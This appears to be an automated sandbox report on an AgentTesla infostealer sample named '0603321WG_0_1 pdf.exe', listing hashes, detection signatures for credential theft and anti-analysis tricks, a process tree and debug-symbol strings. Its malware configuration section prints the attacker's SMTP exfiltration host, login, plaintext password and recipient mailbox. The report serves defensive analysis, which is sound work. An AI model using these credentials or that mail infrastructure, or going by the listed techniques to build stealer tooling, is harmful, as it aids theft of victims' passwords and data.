
Analysis Report 0603321WG_0_1 pdf.exe

Overview

General Information

Sample Name: 0603321WG_0_1 pdf.exe
Analysis ID: 356527
MD5: 9844048a2b7081d223139f100b0ff486
SHA1: 1cb465daf8e6a202356db86a9380e94e6cc1fa4d
SHA256: 283915d333318f5e8e7f30cdf8f8f96723da7af6ddab9c29c6f0b5a687157aa4
Tags: AgentTesla, exe

Most interesting Screenshot:

Detection

Detection: AgentTesla
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • 0603321WG_0_1 pdf.exe (PID: 7004 cmdline: 'C:\Users\user\Desktop\0603321WG_0_1 pdf.exe' MD5: 9844048A2B7081D223139F100B0FF486)
    • cmd.exe (PID: 4804 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 4112 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • 0603321WG_0_1 pdf.exe (PID: 4500 cmdline: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe MD5: 9844048A2B7081D223139F100B0FF486)
    • WerFault.exe (PID: 6448 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 276 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • NewApp.exe (PID: 4972 cmdline: 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe' MD5: 9844048A2B7081D223139F100B0FF486)
    • cmd.exe (PID: 7148 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5672 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • NewApp.exe (PID: 6000 cmdline: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe MD5: 9844048A2B7081D223139F100B0FF486)
    • WerFault.exe (PID: 4660 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 1896 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • NewApp.exe (PID: 7056 cmdline: 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe' MD5: 9844048A2B7081D223139F100B0FF486)
    • cmd.exe (PID: 6240 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 1692 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • NewApp.exe (PID: 5552 cmdline: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe MD5: 9844048A2B7081D223139F100B0FF486)
    • WerFault.exe (PID: 4780 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1464 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "lD7CEXwZN", "URL: ": "http://IScLhfPkYRYa5.com", "To: ": "greatzills@gmail.com", "ByHost: ": "mail.orienttech.com.qa:587", "Password: ": "Y3O4R6toekwlmQ", "From: ": "sales@orienttech.com.qa"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000F.00000002.850762818.00000000050CD000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000013.00000002.879172967.00000000064E4000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(5 of 15 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.0603321WG_0_1 pdf.exe.47a2af0.9.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
19.2.NewApp.exe.650ce20.11.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
7.2.0603321WG_0_1 pdf.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.0603321WG_0_1 pdf.exe.47d8910.8.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
19.2.NewApp.exe.6979bd8.12.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(5 of 10 entries shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
    Source: 0603321WG_0_1 pdf.exe.4500.7.memstr | Malware Configuration Extractor: Agenttesla {"Username: ": "lD7CEXwZN", "URL: ": "http://IScLhfPkYRYa5.com", "To: ": "greatzills@gmail.com", "ByHost: ": "mail.orienttech.com.qa:587", "Password: ": "Y3O4R6toekwlmQ", "From: ": "sales@orienttech.com.qa"}
Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | ReversingLabs: Detection: 21%
Multi AV Scanner detection for submitted file
    Source: 0603321WG_0_1 pdf.exe | ReversingLabs: Detection: 21%
Machine Learning detection for dropped file
    Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
    Source: 0603321WG_0_1 pdf.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
    Source: 7.2.0603321WG_0_1 pdf.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
    Source: 28.2.NewApp.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
    Source: 27.2.NewApp.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8

Compliance:

Uses 32bit PE files
    Source: 0603321WG_0_1 pdf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
    Source: 0603321WG_0_1 pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
                      Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829638034.0000000004DE4000.00000004.00000040.sdmp
                      Source: Binary string: CLBCatQ.pdbse$je source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: WinTypes.pdbOe@j source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: clr.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: .ni.pdb source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbYX&n source: NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: WinTypes.pdbF source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\Desktop\0603321WG_0_1 pdf.PDB source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: rasadhlp.pdbUe:jC source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\0603321WG_0_1 pdf.PDB13 source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp
                      Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: CLBCatQ.pdb4 source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdb< source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb;^ source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdbL source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbW% source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbN source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: psapi.pdb#N source: WerFault.exe, 0000001F.00000003.829483729.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670942444.0000000000EBA000.00000004.00000020.sdmp
                      Source: Binary string: iertutil.pdbP source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb] source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbK source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: nsi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001F.00000003.829638034.0000000004DE4000.00000004.00000040.sdmp
                      Source: Binary string: rasadhlp.pdb^ source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdbd source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wintrust.pdbIeNj source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: rasadhlp.pdb. source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: edputil.pdbCeTj source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbae6je source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbv source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb>Y source: NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.685738561.0000000005184000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.832058326.0000000005764000.00000004.00000040.sdmp
                      Source: Binary string: iVisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp, NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001F.00000003.806462338.0000000000A21000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb0,J source: NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: cldapi.pdbye source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb13Z source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp
                      Source: Binary string: J0603321WG_0_1 pdf.PDB source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdbV#jN source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp
                      Source: Binary string: cryptsp.pdbm source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdbme"j source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: }C:\Users\user\AppData\Roaming\NewApp\NewApp.PDB?p source: NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: .pdb, source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp
                      Source: Binary string: rsaenh.pdbk source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdb&& source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: clrjit.pdbu source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
